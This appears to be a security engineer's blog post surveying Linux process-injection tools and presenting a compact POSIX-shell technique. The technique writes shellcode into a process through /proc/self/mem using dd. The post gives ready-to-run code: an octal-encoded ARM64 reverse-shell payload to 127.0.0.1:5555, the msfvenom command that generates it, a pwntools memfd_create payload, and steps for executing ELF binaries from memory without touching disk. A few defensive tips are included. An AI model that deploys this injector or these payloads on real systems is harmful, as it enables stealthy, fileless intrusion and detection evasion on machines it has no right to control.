I'm joev, a security engineer 👋 You may know me from my work at Apple or on Metasploit, or from my CVEs.
Nowadays I work on open-source security software. This site is a cryptographic experiment of sorts, and a place to store my photos.
Say hello: @joev@infosec.exchange
In this post I'll cover the history of process injection implementations on Linux, and share a somewhat different and simpler implementation aimed at learning and portability.
When pentesting Linux boxes, you often end up in a common situation: you have command execution as a non-root user and want to stage some native code to run on the target. There are a number of methods to accomplish this, but they can be roughly categorized into the following:
exec()
or LD_PRELOAD
the code.ptrace()
or /proc/PID/mem
to debug a sacrificial victim process and plant your native code inside of it.There are downsides to #1; you need a decoding routine, as shell scripts cannot contain binary data. Additionally, you need a writable location on disk; this is not always true in e.g. read-only chroots, filesystems, containers, etc. Finally, many intrusion detection systems look specifically for #1 and alert on it, as it is a typical behavior of malware to stage and run a native implant in a straightforward and widely compatible way.
This post will look at #2.
On Linux you use the ptrace
syscall to remotely control the execution of a process and read/write into its memory. This is a pretty suspicious syscall to trigger in an infected process, and from a command injection entrypoint there are not many ways to control it (gdb
being one way). Further most Linux distros implement a sysctl
called kernel/yama/ptrace_scope
that controls what processes can be ptraced
by an unprivileged user:
The sysctl settings (writable only with CAP_SYS_PTRACE) are:
0 - classic ptrace permissions: a process can PTRACE_ATTACH to any other
process running under the same uid, as long as it is dumpable (i.e.
did not transition uids, start privileged, or have called
prctl(PR_SET_DUMPABLE...) already). Similarly, PTRACE_TRACEME is
unchanged.
1 - restricted ptrace: a process must have a predefined relationship
with the inferior it wants to call PTRACE_ATTACH on. By default,
this relationship is that of only its descendants when the above
classic criteria is also met. To change the relationship, an
inferior can call prctl(PR_SET_PTRACER, debugger, ...) to declare
an allowed debugger PID to call PTRACE_ATTACH on the inferior.
Using PTRACE_TRACEME is unchanged.
2 - admin-only attach: only processes with CAP_SYS_PTRACE may use ptrace
with PTRACE_ATTACH, or through children calling PTRACE_TRACEME.
3 - no attach: no processes may use ptrace with PTRACE_ATTACH nor via
PTRACE_TRACEME. Once set, this sysctl value cannot be changed.
Most modern production systems set 1
, "restricted ptrace", meaning non-root users can only really ptrace
child processes. So a simple way to inject code would be to start a sleep
child process, attach to it with exec gdb
, then go to the current instruction pointer and overwrite the memory it points to with your shellcode. But again, this requires gdb
on the box (usually rare) and is pretty noisy.
On defense, setting
2
is often a good recommendation to make, as it prevents any runtime debugging shenanigans without admin privs, and negates this entire class of techniques for non-root users.
On Linux systems, the procfs
mount implements mem
device files for all processes in the namespace, available at /proc/[pid]/mem
. These devices allow using standard filesystem syscalls to manipulate remote process memory. Behind the scenes, they are more or less a clone of parts of the existing ptrace
syscalls; and in fact use the same ptrace_scope
sysctl and resulting permissions.
This allows us to use standard (util-linux
and coreutils
) commands (like dd
or printf
) to seek through and overwrite remote process memory via these device files; which lets us stage native code quietly and without needing a writable location on disk or relying on esoteric binaries. As such, nearly all implementations of process injection on Linux that I have seen use /proc/[pid]/mem
for injection.
On defense, consider adding a weighted alert on anomalous attempts to
ptrace()
oropen("/proc/*/mem", "w")
The first time I saw this technique used was 2017, in a tool now called GDSSecurity/Cegua mentioned in this blog post. I will summarize it below because what the author did was brilliant; but also abject lunacy, in any case it got the job done for them:
/proc/[pid]/maps
to gather address of child process's stackkill -STOP
the child/proc/[pid]/mem
devicegrep
to… dynamically search for rop gadgets and build a rop chain that stack pivots into shellcode (????)dd
to overwrite the child's stack memory with the rop chain and shellcodekill -CONT
the childNow this is crazy cool, but as the author admits later, the ROP chain is unnecessary. It suffices to just plop some shellcode into memory and have the remote process execute it, which the author eventually realized.
If you are wondering "why can you overwrite a process's executable memory without changing the memory's NX flags?", basically the Linux kernel helpfully disables write protections during use of
ptrace
write calls, for developer convenience. A good explanation of how this is achieved amidst things like hardware-based memory protections can be found here.
In 2018, rb from Sektor7 wrote a comprehensive article on use of ptrace
and /proc/*/mem
techniques for in-memory shellcode injection on Linux. I highly recommend reading this as a starting point, as it provides a simple (but version/offset-dependent) injection script example at the end.
Following this there were a number of tools developed with similar, evolving techniques for Linux process injection. DavidBuchanan314/dlinject
is a more straightforward implementation, but requires python on the target. arget13/DDexec
improves on this by using /bin/sh
instead of python, and researching and documenting how to avoid command dependencies. DDExec
works by overwriting /proc/self/mem
in a forked shell process; which is sort of like a process performing brain surgery on itself 🤯. Recently the same dlinject
author wrote DavidBuchanan314/stelf-loader
, which builds on this approach but with an extremely interesting implementation - it lets you provide an ELF input instead of shellcode and handles transparently loading it into memory for you.
On offense, writing tools that run on all the Linux distros (and modern containers) is an art in itself. The best advice IMHO to write tools that live forever is: know the POSIX shell spec, and try to avoid
exec()
ing to other commands - when you must, only rely on broad packages:utils-linux
andcoreutils
are good starting points.
After reviewing the state of the art here, I like to use a much dumber approach: one that requires very little effort to implement but retains wide compatibility across Linux environments. It just does this:
/proc/self/mem
/proc/self/syscall
to find the return address of the read()
syscalldd skip=...
, then write your shellcode payloadread()
from the child process, triggering the payloadThis is written to only require dd
(part of coreutils
) and absolutely nothing else. It can be pulled together in 4 lines of portable POSIX shell script, here you go:
PAYLOAD='\002\000\240\343\001\020\240\343\005\040\201\342\214\160'\
'\240\343\215\160\207\342\000\000\000\357\000\140\240\341\140\020'\
'\217\342\020\040\240\343\215\160\240\343\216\160\207\342\000\000'\
'\000\357\006\000\240\341\000\020\240\343\077\160\240\343\000\000'\
'\000\357\006\000\240\341\001\020\240\343\077\160\240\343\000\000'\
'\000\357\006\000\240\341\002\020\240\343\077\160\240\343\000\000'\
'\000\357\044\000\217\342\004\100\044\340\020\000\055\351\015\040'\
'\240\341\044\100\217\342\020\000\055\351\015\020\240\341\013\160'\
'\240\343\000\000\000\357\002\000\025\263\177\000\000\001\057\142'\
'\151\156\057\163\150\000\000\000\000\000\000\000\000\000\163\150'\
'\000\000\000\000\000\000\000\000\000\000\000\000\000\000'
(
exec 5>/proc/self/mem
read -r _ _ _ _ _ _ _ _ ADDR </proc/self/syscall
( dd count=0 bs=1 skip=$((ADDR)) <&5; printf "${PAYLOAD}" >&5 )
) &
Pro tip: On offense, use
printf
with\000
octal for decoding embedded binary data within a shell script; it's the only binary decoding routine guaranteed by the POSIXsh
spec.
The shellcode above is for the ARM64
architecture, generated by metasploit and encoded into octal; it connects a TCP reverse shell over to a listener on 127.0.0.1:5555
. Here is how I generated it (use aarch64
for ARM64 and x64
for X86_64):
$ docker run -it metasploitframework/metasploit-framework bash
> ./msfvenom -p linux/aarch64/shell_reverse_tcp lhost=127.0.0.1 lport=5555 -f raw | \
ruby -e 'STDIN.read.bytes.each { |b| printf "\\%03o", b }'
Of course a reverse shell payload is not practical at all; we already have command execution in this situation. The much more useful thing to do is to create a memory-backed fd that we can then write an arbitrary ELF executable to and execute. So we'll tweak the shellcode payload a bit to do this. You can use metasm_shell.rb
to do this in metasploit, but pwntools
makes things a bit easier IMO, as it is architecture-agnostic. We'll have the shellcode call memfd_create
, then send itself a SIG_STOP
so we can use the memfd from our original shell:
$ docker run --platform linux/amd64 -it pwntools/pwntools
pwntools@d7869fd2a307:/$ python
>>> from pwn import *
import sys
context.arch = 'arm64'
sc = asm(shellcraft.memfd_create("", 0)) + asm(shellcraft.kill(0, 19))
output = ""
for b in sc:
output += "\\%03o" % (b)
print("PAYLOAD='%s'" % (output))
Which yields:
PAYLOAD='\356\003\037\252\356\017\037\370\340\003\000\221\341\003\037'\
'\252\350\042\200\322\001\000\000\324\340\003\037\252\141\002\200\322'\
'\050\020\200\322\001\000\000\324'
After executing the above shellcode, we can find the writable memfd handle number by consulting the child process:
$ CHILD=$!
$ ls -al /proc/$CHILD/fd/
total 0
dr-x------ 2 msf msf 0 Aug 29 20:45 .
dr-xr-xr-x 9 msf msf 0 Aug 29 20:44 ..
lrwx------ 1 msf msf 64 Aug 29 20:45 0 -> /dev/pts/0
lrwx------ 1 msf msf 64 Aug 29 20:45 1 -> /dev/pts/0
lrwx------ 1 msf msf 64 Aug 29 20:45 2 -> /dev/pts/0
lrwx------ 1 msf msf 64 Aug 29 20:45 255 -> /dev/pts/0
lrwx------ 1 msf msf 64 Aug 29 20:45 3 -> /memfd: (deleted)
l-wx------ 1 msf msf 64 Aug 29 20:45 5 -> /proc/123/mem
We can then just use a series of printf
statements to write our ELF executable to the memfd
on fd#3, and execute it like normal.
$ printf '...' >> /proc/$CHILD/fd/3
$ /proc/$CHILD/fd/3 &
And that is one way to run executables on Linux without ever touching disk. This approach should work on all distributions of Linux, provided sys/kernel/yama/ptrace_scope
is set to 1 or lower and the dd
bin is available. If by some chance dd
is missing (dd
is part of coreutils, but you never know), see DDExec for a list of alternative common Linux commands that will seek a file descriptor to a desired offset.